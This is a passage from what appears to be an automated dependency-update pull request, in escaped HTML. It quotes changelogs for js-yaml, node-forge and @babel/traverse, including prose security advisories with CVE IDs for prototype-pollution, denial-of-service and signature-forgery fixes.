href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[3.14.2] - 2025-11-15\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBackported v4.1.1 fix to v3\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.1.0] - 2021-04-15\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eTypes are now exported as \u003ccode\u003eyaml.types.XXX\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eEvery type now has \u003ccode\u003eoptions\u003c/code\u003e property with original arguments kept as they were\n(see \u003ccode\u003eyaml.types.int.options\u003c/code\u003e as an example).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003eSchema.extend()\u003c/code\u003e now keeps old type order in case of conflicts\n(e.g. Schema.extend([ a, b, c ]).extend([ b, a, d ]) is now ordered as \u003ccode\u003eabcd\u003c/code\u003e instead of \u003ccode\u003ecbad\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[4.0.0] - 2021-01-03\u003c/h2\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eCheck \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/migrate_v3_to_v4.md\"\u003emigration guide\u003c/a\u003e to see details for all breaking changes.\u003c/li\u003e\n\u003cli\u003eBreaking: \u0026quot;unsafe\u0026quot; tags \u003ccode\u003e!!js/function\u003c/code\u003e, \u003ccode\u003e!!js/regexp\u003c/code\u003e, \u003ccode\u003e!!js/undefined\u003c/code\u003e are\nmoved to \u003ca href=\"https://github.com/nodeca/js-yaml-js-types\"\u003ejs-yaml-js-types\u003c/a\u003e package.\u003c/li\u003e\n\u003cli\u003eBreaking: removed \u003ccode\u003esafe*\u003c/code\u003e functions. Use \u003ccode\u003eload\u003c/code\u003e, \u003ccode\u003eloadAll\u003c/code\u003e, \u003ccode\u003edump\u003c/code\u003e\ninstead which are all now safe by default.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.DEFAULT_SAFE_SCHEMA\u003c/code\u003e and \u003ccode\u003eyaml.DEFAULT_FULL_SCHEMA\u003c/code\u003e are removed, use\n\u003ccode\u003eyaml.DEFAULT_SCHEMA\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003eyaml.Schema.create(schema, tags)\u003c/code\u003e is removed, use \u003ccode\u003eschema.extend(tags)\u003c/code\u003e instead.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003e!!binary\u003c/code\u003e now always mapped to \u003ccode\u003eUint8Array\u003c/code\u003e on load.\u003c/li\u003e\n\u003cli\u003eReduced nesting of \u003ccode\u003e/lib\u003c/code\u003e folder.\u003c/li\u003e\n\u003cli\u003eParse numbers according to YAML 1.2 instead of YAML 1.1 (\u003ccode\u003e01234\u003c/code\u003e is now decimal,\n\u003ccode\u003e0o1234\u003c/code\u003e is octal, \u003ccode\u003e1:23\u003c/code\u003e is parsed as string instead of base60).\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e no longer quotes \u003ccode\u003e:\u003c/code\u003e, \u003ccode\u003e[\u003c/code\u003e, \u003ccode\u003e]\u003c/code\u003e, \u003ccode\u003e(\u003c/code\u003e, \u003ccode\u003e)\u003c/code\u003e except when necessary, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/470\"\u003e#470\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/557\"\u003e#557\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eLine and column in exceptions are now formatted as \u003ccode\u003e(X:Y)\u003c/code\u003e instead of\n\u003ccode\u003eat line X, column Y\u003c/code\u003e (also present in compact format), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/332\"\u003e#332\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCode snippet created in exceptions now contains multiple lines with line numbers.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e now serializes \u003ccode\u003eundefined\u003c/code\u003e as \u003ccode\u003enull\u003c/code\u003e in collections and removes keys with\n\u003ccode\u003eundefined\u003c/code\u003e in mappings, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/571\"\u003e#571\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003edump()\u003c/code\u003e with \u003ccode\u003eskipInvalid=true\u003c/code\u003e now serializes invalid items in collections as null.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003e!\u003c/code\u003e are now dumped as \u003ccode\u003e!tag\u003c/code\u003e instead of \u003ccode\u003e!\u0026lt;!tag\u0026gt;\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/576\"\u003e#576\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eCustom tags starting with \u003ccode\u003etag:yaml.org,2002:\u003c/code\u003e are now shorthanded using \u003ccode\u003e!!\u003c/code\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/258\"\u003e#258\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded \u003ccode\u003e.mjs\u003c/code\u003e (es modules) support.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003equotingType\u003c/code\u003e and \u003ccode\u003eforceQuotes\u003c/code\u003e options for dumper to configure\nstring literal style, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/290\"\u003e#290\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/529\"\u003e#529\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eAdded \u003ccode\u003estyles: { '!!null': 'empty' }\u003c/code\u003e option for dumper\n(serializes \u003ccode\u003e{ foo: null }\u003c/code\u003e as \u0026quot;\u003ccode\u003efoo: \u003c/code\u003e\u0026quot;), \u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/570\"\u003e#570\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/9963d366dfbde0c69722452bcd40b41e7e4160a0\"\u003e\u003ccode\u003e9963d36\u003c/code\u003e\u003c/a\u003e 3.14.2 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/10d3c8e70a6888543f5cdb656bb39f73e0ea77c1\"\u003e\u003ccode\u003e10d3c8e\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/5278870a17454fe8621dbd8c445c412529525266\"\u003e\u003ccode\u003e5278870\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;) (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/731\"\u003e#731\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/3.14.1...3.14.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `node-forge` from 1.3.0 to 1.4.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/digitalbazaar/forge/blob/main/CHANGELOG.md\"\u003enode-forge's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e1.4.0 - 2026-03-24\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Denial of Service in \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003eA Denial of Service (DoS) vulnerability exists due to an infinite loop in\nthe \u003ccode\u003eBigInteger.modInverse()\u003c/code\u003e function (inherited from the bundled jsbn\nlibrary). When \u003ccode\u003emodInverse()\u003c/code\u003e is called with a zero value as input, the\ninternal Extended Euclidean Algorithm enters an unreachable exit condition,\ncausing the process to hang indefinitely and consume 100% CPU.\u003c/li\u003e\n\u003cli\u003eReported by Kr0emer.\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33891\"\u003eCVE-2026-33891\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-5m6q-g25r-mvwx\"\u003eGHSA-5gfm-wpxj-wjgq\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in RSA-PKCS due to ASN.1 extra field.\n\u003cul\u003e\n\u003cli\u003eRSASSA PKCS#1 v1.5 signature verification accepts forged signatures for low\npublic exponent keys (e=3). Attackers can forge signatures by stuffing\n\u0026quot;garbage\u0026quot; bytes within the ASN.1 structure in order to construct a\nsignature that passes verification, enabling Bleichenbacher style forgery.\nThis issue is similar to CVE-2022-24771, but adds bytes in an addition\nfield within the ASN.1 structure, rather than outside of it.\u003c/li\u003e\n\u003cli\u003eAdditionally, forge does not validate that signatures include a minimum of\n8 bytes of padding as defined by the specification, providing attackers\nadditional space to construct Bleichenbacher forgeries.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33894\"\u003eCVE-2026-33894\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-ppp5-5v6c-4jwp\"\u003eGHSA-ppp5-5v6c-4jwp\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: Signature forgery in Ed25519 due to missing S \u0026lt; L check.\n\u003cul\u003e\n\u003cli\u003eEd25519 signature verification accepts forged non-canonical signatures\nwhere the scalar S is not reduced modulo the group order (S \u0026gt;= L). A valid\nsignature and its S + L variant both verify in forge, while Node.js\ncrypto.verify (OpenSSL-backed) rejects the S + L variant, as defined by the\nspecification. This class of signature malleability has been exploited in\npractice to bypass authentication and authorization logic (see\nCVE-2026-25793, CVE-2022-35961). Applications relying on signature\nuniqueness (i.e., dedup by signature bytes, replay tracking, signed-object\ncanonicalization checks) may be bypassed.\u003c/li\u003e\n\u003cli\u003eReported as part of a U.C. Berkeley security research project by:\n\u003cul\u003e\n\u003cli\u003eAustin Chu, Sohee Kim, and Corban Villa.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33895\"\u003eCVE-2026-33895\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-q67f-28xg-22rw\"\u003eGHSA-q67f-28xg-22rw\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eHIGH\u003c/strong\u003e: \u003ccode\u003ebasicConstraints\u003c/code\u003e bypass in certificate chain verification.\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003epki.verifyCertificateChain()\u003c/code\u003e does not enforce RFC 5280 \u003ccode\u003ebasicConstraints\u003c/code\u003e\nrequirements when an intermediate certificate lacks both the\n\u003ccode\u003ebasicConstraints\u003c/code\u003e and \u003ccode\u003ekeyUsage\u003c/code\u003e extensions. This allows any leaf\ncertificate (without these extensions) to act as a CA and sign other\ncertificates, which node-forge will accept as valid.\u003c/li\u003e\n\u003cli\u003eReported by Doruk Tan Ozturk (\u003ca href=\"https://github.com/peaktwilight\"\u003e\u003ccode\u003e@​peaktwilight\u003c/code\u003e\u003c/a\u003e) - doruk.ch\u003c/li\u003e\n\u003cli\u003eCVE ID: \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2026-33896\"\u003eCVE-2026-33896\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGHSA ID: \u003ca href=\"https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25\"\u003eGHSA-2328-f5f3-gj25\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/fa385f92440879601240020f158bed68e444e83a\"\u003e\u003ccode\u003efa385f9\u003c/code\u003e\u003c/a\u003e Release 1.4.0.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/07d4e162762ed4fdab5caca9ebf78237fcf85339\"\u003e\u003ccode\u003e07d4e16\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/cb90fd92091ee34e4abab3ad0c835eeea3d06c3e\"\u003e\u003ccode\u003ecb90fd9\u003c/code\u003e\u003c/a\u003e Update changelog.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/963e7c5c7b0f03de1b28a1e5a42a6bafda4cf711\"\u003e\u003ccode\u003e963e7c5\u003c/code\u003e\u003c/a\u003e Add unit test for \u0026quot;pseudonym\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/f0b6f5b7c5d1c918240e975e0cade4f47d005446\"\u003e\u003ccode\u003ef0b6f5b\u003c/code\u003e\u003c/a\u003e Add pseudonym OID\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/3df48a311d4b53dc6493b7a47a8d07f3669957d9\"\u003e\u003ccode\u003e3df48a3\u003c/code\u003e\u003c/a\u003e Fix missing CVE ID.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90\"\u003e\u003ccode\u003e2e49283\u003c/code\u003e\u003c/a\u003e Add x509 \u003ccode\u003ebasicConstraints\u003c/code\u003e check.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/bdecf11571c9f1a487cc0fe72fe78ff6dfa96b85\"\u003e\u003ccode\u003ebdecf11\u003c/code\u003e\u003c/a\u003e Add canonical signature scaler check for S \u0026lt; L.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/af094e69c60ac5f7b29f2b1957c53ae5e12fd4a0\"\u003e\u003ccode\u003eaf094e6\u003c/code\u003e\u003c/a\u003e Add RSA padding and DigestInfo length checks.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/digitalbazaar/forge/commit/796eeb1673f6ec636fda02dfc295047d9f7aefe0\"\u003e\u003ccode\u003e796eeb1\u003c/code\u003e\u003c/a\u003e Improve jsbn fix.\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/digitalbazaar/forge/compare/v1.3.0...v1.4.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `@babel/traverse` from 7.14.2 to 7.29.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/babel/babel/releases\"\u003e\u003ccode\u003e@​babel/traverse\u003c/code\u003e's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev7.29.0 (2026-01-31)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e for your first PR!\u003c/p\u003e\n\u003ch4\u003e:rocket: New Feature\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17750\"\u003e#17750\u003c/a\u003e [7.x backport] Add attributes import declaration builder (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17663\"\u003e#17663\u003c/a\u003e [7.x backport] feat(standalone): export async transform (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17725\"\u003e#17725\u003c/a\u003e [7.x backport] feat: read standalone targets from data-targets (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-parser\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17765\"\u003e#17765\u003c/a\u003e fix(parser): correctly parse type assertions in \u003ccode\u003eextends\u003c/code\u003e clause (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17723\"\u003e#17723\u003c/a\u003e [7.x backport] fix(parser): improve super type argument parsing (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17708\"\u003e#17708\u003c/a\u003e fix(traverse): provide a hub when traversing a File or Program and no parentPath is given (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-block-scoping\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17737\"\u003e#17737\u003c/a\u003e [7.x backport] fix: Rename switch discriminant references when body creates shadowing variable (\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:running_woman: Performance\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-generator\u003c/code\u003e, \u003ccode\u003ebabel-runtime-corejs3\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17642\"\u003e#17642\u003c/a\u003e [Babel 7] Improve generator performance (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003eCommitters: 6\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003eDavid (\u003ca href=\"https://github.com/simbahax\"\u003e\u003ccode\u003e@​simbahax\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eHuáng Jùnliàng (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eNicolò Ribaudo (\u003ca href=\"https://github.com/nicolo-ribaudo\"\u003e\u003ccode\u003e@​nicolo-ribaudo\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/magic-akari\"\u003e\u003ccode\u003e@​magic-akari\u003c/code\u003e\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev7.28.6 (2026-01-12)\u003c/h2\u003e\n\u003cp\u003eThanks \u003ca href=\"https://github.com/kadhirash\"\u003e\u003ccode\u003e@​kadhirash\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/kolvian\"\u003e\u003ccode\u003e@​kolvian\u003c/code\u003e\u003c/a\u003e for your first PRs!\u003c/p\u003e\n\u003ch4\u003e:bug: Bug Fix\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-cli\u003c/code\u003e, \u003ccode\u003ebabel-code-frame\u003c/code\u003e, \u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-helper-check-duplicate-nodes\u003c/code\u003e, \u003ccode\u003ebabel-helper-fixtures\u003c/code\u003e, \u003ccode\u003ebabel-helper-plugin-utils\u003c/code\u003e, \u003ccode\u003ebabel-node\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-flow-comments\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-modules-commonjs\u003c/code\u003e, \u003ccode\u003ebabel-plugin-transform-property-mutators\u003c/code\u003e, \u003ccode\u003ebabel-preset-env\u003c/code\u003e, \u003ccode\u003ebabel-traverse\u003c/code\u003e, \u003ccode\u003ebabel-types\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17589\"\u003e#17589\u003c/a\u003e Improve Unicode handling in code-frame tokenizer (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-regenerator\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17556\"\u003e#17556\u003c/a\u003e fix: \u003ccode\u003etransform-regenerator\u003c/code\u003e correctly handles scope (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-transform-react-jsx\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17538\"\u003e#17538\u003c/a\u003e fix: Keep jsx comments (\u003ca href=\"https://github.com/liuxingbaoyu\"\u003e\u003ccode\u003e@​liuxingbaoyu\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:nail_care: Polish\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-core\u003c/code\u003e, \u003ccode\u003ebabel-standalone\u003c/code\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/babel/babel/pull/17606\"\u003e#17606\u003c/a\u003e Polish(standalone): improve message on invalid preset/plugin (\u003ca href=\"https://github.com/JLHwung\"\u003e\u003ccode\u003e@​JLHwung\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch4\u003e:house: Internal\u003c/h4\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ccode\u003ebabel-plugin-bugfix-v8-static-class-fields-redefine-readonly\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-attributes-to-assertions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-proposal-import-wasm-source\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-async-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-decorators\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-destructuring-private\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-do-expressions\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-explicit-resource-management\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-export-default-from\u003c/code\u003e, \u003ccode\u003ebabel-plugin-syntax-flow\u003c/code\u003e, 